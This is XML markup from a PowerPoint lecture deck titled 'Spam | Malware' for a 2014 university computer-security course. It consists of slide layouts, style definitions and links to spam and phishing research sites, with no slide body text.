        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3436622816"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>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8400"/>
            <a:ext cx="2133600" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr 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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="6248400"/>
            <a:ext cx="2133600" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{EB6D99CD-758A-8E44-A87E-DEF43D26546F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="984620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33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smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="201706" y="1904253"/>
            <a:ext cx="8727141" cy="4519331"/>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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EB6D99CD-758A-8E44-A87E-DEF43D26546F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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Rockwell"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Rockwe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text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223185" y="0"/>
            <a:ext cx="260909" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a: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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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smtClean="0"/>
              <a:t>Drag picture to placeholder or click icon to add</a:t>
            </a:r>
            <a:endParaRPr/>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smtClean="0"/>
              <a:t>Drag picture to placeholder or click icon to add</a:t>
            </a:r>
            <a:endParaRPr/>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spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8305800" y="6248774"/>
            <a:ext cx="554038" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1AE541A8-D53F-3F4B-99AF-9027B68691FD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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33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3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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7E2AC320-FB14-E74C-BBA5-D2AD527E09B0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223185" y="0"/>
            <a:ext cx="260909" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>+</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33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lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FF7A5B9F-5EED-C54D-9C23-513CD1100D25}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223185" y="0"/>
            <a:ext cx="260909" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a: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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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4" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8166847" y="282574"/>
            <a:ext cx="685800" cy="133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EB6D99CD-758A-8E44-A87E-DEF43D26546F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223185" y="0"/>
            <a:ext cx="260909" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>+</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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EB6D99CD-758A-8E44-A87E-DEF43D26546F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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2" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223185" y="0"/>
            <a:ext cx="260909" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a: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100000">
              <a:schemeClr val="accent3"/>
            </a:gs>
            <a:gs pos="75000">
              <a:schemeClr val="bg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706" y="484094"/>
            <a:ext cx="7853081" cy="1116106"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="201706" y="1600200"/>
            <a:ext cx="8727141" cy="482338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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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EB6D99CD-758A-8E44-A87E-DEF43D26546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Lst>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
  <p:hf hdr="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="3600" b="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:latin typeface="Rockwell"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Rockwell"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="342000" indent="-342000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="2000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent6"/>
        </a:buClr>
        <a:buSzPct val="75000"/>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buChar char="n"/>
        <a:defRPr sz="2800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="15000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:latin typeface="Tahoma"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Tahoma"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="496800" indent="-270000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="600"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent2"/>
        </a:buClr>
        <a:buSzPct val="75000"/>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buChar char="n"/>
        <a:defRPr sz="2000" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="15000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:latin typeface="Tahoma"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Tahoma"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="685800" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="600"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent4"/>
        </a:buClr>
        <a:buSzPct val="75000"/>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buChar char="n"/>
        <a:defRPr sz="1600" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="15000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:latin typeface="Tahoma"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Tahoma"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="914400" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="600"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent4"/>
        </a:buClr>
        <a:buSzPct val="75000"/>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buChar char="n"/>
        <a:defRPr sz="1600" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="15000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:latin typeface="Tahoma"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Tahoma"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1143000" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="600"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent1"/>
        </a:buClr>
        <a:buSzPct val="75000"/>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buChar char="n"/>
        <a:defRPr sz="1600" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="15000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:latin typeface="Tahoma"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Tahoma"/>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www.paulgraham.com/spam.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pamassassin.apache.org/tests_3_3_x.html" TargetMode="External"/><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www.spamhaus.org/"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hyperlink" Target="http://www.uclouvain.be/12703.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.uclouvain.be/7489.html" TargetMode="External"/><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1.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2.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png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.spamhaus.org/statistics/countries/"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4.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5.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hyperlink" Target="http://www.antiphishing.org/"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27.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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caida.org/analysis/security/code-red/"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2.wmf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9.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emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.emf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout11.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.em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sz="4000" dirty="0" smtClean="0"/>
              <a:t>Spam | Malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="5410200"/>
            <a:ext cx="7037266" cy="900952"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>INGI2347: COMPUTER SYSTEM SECURITY (Spring 2014)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Marco Canini</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="UCL_mention_RVB_web.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81800" y="4495800"/>
            <a:ext cx="1111383" cy="1539240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Footer Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="6400800"/>
            <a:ext cx="6580094"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100" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2286000" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743200" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl7pPr>
